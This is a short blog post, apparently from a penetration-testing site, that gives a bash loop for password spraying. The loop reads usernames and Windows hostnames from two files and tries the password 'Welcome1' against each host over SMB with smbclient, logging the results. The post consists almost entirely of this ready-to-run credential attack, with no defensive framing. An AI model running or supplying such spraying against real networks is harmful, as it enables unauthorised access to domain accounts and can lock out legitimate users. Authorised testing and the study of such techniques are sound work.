Instead of throwing your auth attempts at one IP, throw them at many:
username_file=/root/users.txt targets_file=/root/windows-hosts.txt how_deep_to_go=2000 for index in $(seq 1 ${how_deep_to_go}); do username=$(sed -n ${index}p ${username_file}) target=$(sed -n ${index}p ${targets_file}) echo "smbclient -U mydomainhere/${username}%Welcome1 -L //${target}" smbclient -U mydomainhere/${username}%Welcome1 -L //${target} done | tee smb-round-robin.out
No comments:
Post a Comment